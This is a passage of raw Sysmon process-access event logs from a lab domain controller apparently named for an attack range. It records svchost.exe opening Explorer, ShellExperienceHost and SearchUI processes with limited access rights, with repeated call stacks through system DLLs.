10341000x80000000000000001055321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 